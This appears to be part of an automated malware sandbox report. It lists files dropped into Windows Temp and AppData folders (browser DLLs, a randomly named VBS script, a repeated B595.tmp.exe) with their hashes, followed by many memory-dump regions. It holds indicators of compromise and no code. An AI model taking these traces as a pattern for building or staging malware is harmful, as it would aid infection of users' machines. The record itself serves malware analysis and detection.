C:\Users\Admin\AppData\Local\Temp\D14EC72F\mozglue.dllFilesize
135KB
MD59e682f1eb98a9d41468fc3e50f907635
SHA185e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SHA512230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed
-
C:\Users\Admin\AppData\Local\Temp\D14EC72F\msvcp140.dllFilesize
429KB
MD5109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
C:\Users\Admin\AppData\Local\Temp\D14EC72F\nss3.dllFilesize
1.2MB
MD5556ea09421a0f74d31c4c0a89a70dc23
SHA1f739ba9b548ee64b13eb434a3130406d23f836e3
SHA256f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
SHA5122481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2
-
C:\Users\Admin\AppData\Local\Temp\D14EC72F\vcruntime140.dllFilesize
81KB
MD57587bf9cb4147022cd5681b015183046
SHA1f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA5120b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2szabp1.f0i.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\fhhpuyrmeopvjuwpnwfqp.vbsFilesize
504B
MD5ea99b088a26346e79bc2b2b2c441676f
SHA1f91f1cb81b47e86ac00e3a60d44f3ff9eb4d7e82
SHA256bd365d88e950b756bc30a35f8c2c2010cab3e5e70bb9290d0fcfd180ee40674a
SHA512c6dbb39251cc21ac0a64056e55e7aa885055be0f87e29d4cffa86f181a4786458fbb8e3531fbd6e8af39809df80ad7c1e692f792d1c33aa654a8fca4d0d217d8
-
C:\Users\Admin\AppData\Roaming\B595.tmp.exeFilesize
3.6MB
MD520d27d8d88014215720e53218998dc59
SHA1392a43d9a4ac4feb0731552d3bb4cbc5801bb862
SHA256a81da88f6e47eeb58b864d01b09ed273421ab6e1b9b3c5f763f47a913b5b2ff3
SHA512579ccc664bdee663bc1ca05a3b7fb4fd7ff65d58b669159450a5787cff7c09e3a8bf70b9f2ce1fa594b7e920b474473168c7e7a13293b8f7d7625aec0f3af439
-
C:\Users\Admin\AppData\Roaming\B595.tmp.exeFilesize
3.6MB
MD520d27d8d88014215720e53218998dc59
SHA1392a43d9a4ac4feb0731552d3bb4cbc5801bb862
SHA256a81da88f6e47eeb58b864d01b09ed273421ab6e1b9b3c5f763f47a913b5b2ff3
SHA512579ccc664bdee663bc1ca05a3b7fb4fd7ff65d58b669159450a5787cff7c09e3a8bf70b9f2ce1fa594b7e920b474473168c7e7a13293b8f7d7625aec0f3af439
-
C:\Users\Admin\AppData\Roaming\B595.tmp.exeFilesize
3.6MB
MD520d27d8d88014215720e53218998dc59
SHA1392a43d9a4ac4feb0731552d3bb4cbc5801bb862
SHA256a81da88f6e47eeb58b864d01b09ed273421ab6e1b9b3c5f763f47a913b5b2ff3
SHA512579ccc664bdee663bc1ca05a3b7fb4fd7ff65d58b669159450a5787cff7c09e3a8bf70b9f2ce1fa594b7e920b474473168c7e7a13293b8f7d7625aec0f3af439
-
memory/660-2578-0x0000022AB4F80000-0x0000022AB4F90000-memory.dmpFilesize
64KB
-
memory/660-2887-0x0000022AB5340000-0x0000022AB535C000-memory.dmpFilesize
112KB
-
memory/660-2579-0x0000022AB4F80000-0x0000022AB4F90000-memory.dmpFilesize
64KB
-
memory/660-2581-0x0000022AB4F80000-0x0000022AB4F90000-memory.dmpFilesize
64KB
-
memory/744-180-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/744-176-0x00000000010C0000-0x00000000010C2000-memory.dmpFilesize
8KB
-
memory/744-171-0x0000000000F50000-0x0000000000F6C000-memory.dmpFilesize
112KB
-
memory/744-165-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/744-169-0x0000000000F50000-0x0000000000F6C000-memory.dmpFilesize
112KB
-
memory/744-172-0x0000000001090000-0x00000000010AA000-memory.dmpFilesize
104KB
-
memory/744-181-0x0000000000F50000-0x0000000000F6C000-memory.dmpFilesize
112KB
-
memory/744-174-0x0000000000F50000-0x0000000000F6C000-memory.dmpFilesize
112KB
-
memory/744-173-0x0000000002D60000-0x0000000003D60000-memory.dmpFilesize
16.0MB
-
memory/744-164-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/744-167-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/744-162-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/744-166-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/1392-134-0x00000000053A0000-0x00000000053B0000-memory.dmpFilesize
64KB
-
memory/1392-133-0x00000000007D0000-0x0000000000A9A000-memory.dmpFilesize
2.8MB
-
memory/1392-155-0x00000000053A0000-0x00000000053B0000-memory.dmpFilesize
64KB
-
memory/1392-135-0x00000000057B0000-0x00000000057D2000-memory.dmpFilesize
136KB
-
memory/1644-198-0x0000018002400000-0x0000018002798000-memory.dmpFilesize
3.6MB
-
memory/1644-200-0x0000018002B60000-0x0000018002B82000-memory.dmpFilesize
136KB
-
memory/1644-204-0x000001801E460000-0x000001801E470000-memory.dmpFilesize
64KB
-
memory/1684-2533-0x0000000000400000-0x0000000000480000-memory.dmpFilesize
512KB
-
memory/1684-2712-0x0000000000400000-0x0000000000480000-memory.dmpFilesize
512KB
-
memory/1784-205-0x0000000000580000-0x000000000089A000-memory.dmpFilesize
3.1MB
-
memory/1784-255-0x00000000051E0000-0x00000000051F0000-memory.dmpFilesize
64KB
-
memory/1784-1062-0x00000000051E0000-0x00000000051F0000-memory.dmpFilesize
64KB
-
memory/1976-1296-0x0000000004920000-0x0000000004930000-memory.dmpFilesize
64KB
-
memory/1976-362-0x0000000004920000-0x0000000004930000-memory.dmpFilesize
64KB
-
memory/1976-364-0x0000000004920000-0x0000000004930000-memory.dmpFilesize
64KB
-
memory/1976-1294-0x0000000004920000-0x0000000004930000-memory.dmpFilesize
64KB
-
memory/2240-137-0x0000000005930000-0x0000000005F58000-memory.dmpFilesize
6.2MB
-
memory/2240-157-0x00000000052F0000-0x0000000005300000-memory.dmpFilesize
64KB
-
memory/2240-158-0x00000000052F0000-0x0000000005300000-memory.dmpFilesize
64KB
-
memory/2240-151-0x00000000067B0000-0x00000000067CE000-memory.dmpFilesize
120KB
-
memory/2240-150-0x00000000052F0000-0x0000000005300000-memory.dmpFilesize
64KB
-
memory/2240-153-0x0000000007FF0000-0x000000000866A000-memory.dmpFilesize
6.5MB
-
memory/2240-139-0x00000000061A0000-0x0000000006206000-memory.dmpFilesize
408KB
-
memory/2240-152-0x00000000052F0000-0x0000000005300000-memory.dmpFilesize
64KB
-
memory/2240-138-0x00000000060C0000-0x0000000006126000-memory.dmpFilesize
408KB
-
memory/2240-149-0x00000000052F0000-0x0000000005300000-memory.dmpFilesize
64KB
-
memory/2240-154-0x0000000006CB0000-0x0000000006CCA000-memory.dmpFilesize
104KB
-
memory/2240-156-0x00000000052F0000-0x0000000005300000-memory.dmpFilesize
64KB
-
memory/2240-136-0x0000000005240000-0x0000000005276000-memory.dmpFilesize
216KB
-
memory/2716-2554-0x00000000058F0000-0x00000000058FE000-memory.dmpFilesize
56KB
-
memory/2716-2537-0x0000000074D90000-0x0000000074DDC000-memory.dmpFilesize
304KB
-
memory/2716-2536-0x0000000005FF0000-0x0000000006022000-memory.dmpFilesize
200KB
-
memory/2716-2535-0x0000000002540000-0x0000000002550000-memory.dmpFilesize
64KB
-
memory/2716-2534-0x0000000002540000-0x0000000002550000-memory.dmpFilesize
64KB
-
memory/2716-2547-0x0000000005F40000-0x0000000005F5E000-memory.dmpFilesize
120KB
-
memory/2716-2548-0x000000007F680000-0x000000007F690000-memory.dmpFilesize
64KB
-
memory/2716-2549-0x0000000002540000-0x0000000002550000-memory.dmpFilesize
64KB
-
memory/2716-2550-0x0000000006DC0000-0x0000000006DCA000-memory.dmpFilesize
40KB
-
memory/2716-2551-0x0000000006FE0000-0x0000000007076000-memory.dmpFilesize
600KB
-
memory/2716-2557-0x0000000006F90000-0x0000000006FAA000-memory.dmpFilesize
104KB
-
memory/2716-2558-0x0000000006F80000-0x0000000006F88000-memory.dmpFilesize
32KB
-
memory/3340-206-0x0000000000400000-0x00000000004A6000-memory.dmpFilesize
664KB
-
memory/3340-284-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-357-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-366-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-368-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-254-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-371-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-373-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-375-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-377-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-349-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-209-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-347-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-1064-0x0000025A7BE40000-0x0000025A7BE50000-memory.dmpFilesize
64KB
-
memory/3340-297-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-274-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-295-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-267-0x0000025A7BE40000-0x0000025A7BE50000-memory.dmpFilesize
64KB
-
memory/3340-293-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-210-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-291-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-288-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-286-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-363-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-282-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-280-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-278-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-276-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3340-272-0x0000025A7BC90000-0x0000025A7BD68000-memory.dmpFilesize
864KB
-
memory/3644-183-0x00007FF4F3E00000-0x00007FF4F3EFA000-memory.dmpFilesize
1000KB
-
memory/3644-175-0x000001944D1B0000-0x000001944D1B1000-memory.dmpFilesize
4KB
-
memory/3644-389-0x00007FF4F3E00000-0x00007FF4F3EFA000-memory.dmpFilesize
1000KB
-
memory/3644-177-0x000001944D2D0000-0x000001944D2D7000-memory.dmpFilesize
28KB
-
memory/3644-178-0x00007FF4F3E00000-0x00007FF4F3EFA000-memory.dmpFilesize
1000KB
-
memory/3644-179-0x00007FF4F3E00000-0x00007FF4F3EFA000-memory.dmpFilesize
1000KB
-
memory/3644-185-0x00007FF4F3E00000-0x00007FF4F3EFA000-memory.dmpFilesize
1000KB
-
memory/3644-182-0x00007FF4F3E00000-0x00007FF4F3EFA000-memory.dmpFilesize
1000KB
-
memory/3644-184-0x00007FF4F3E00000-0x00007FF4F3EFA000-memory.dmpFilesize
1000KB
-
memory/4220-2587-0x000001C5F9D90000-0x000001C5F9DA0000-memory.dmpFilesize
64KB
-
memory/4456-2576-0x0000021625670000-0x0000021625680000-memory.dmpFilesize
64KB
-
memory/4548-370-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4548-194-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4548-190-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4548-199-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4904-189-0x0000000000210000-0x00000000004E2000-memory.dmpFilesize
2.8MB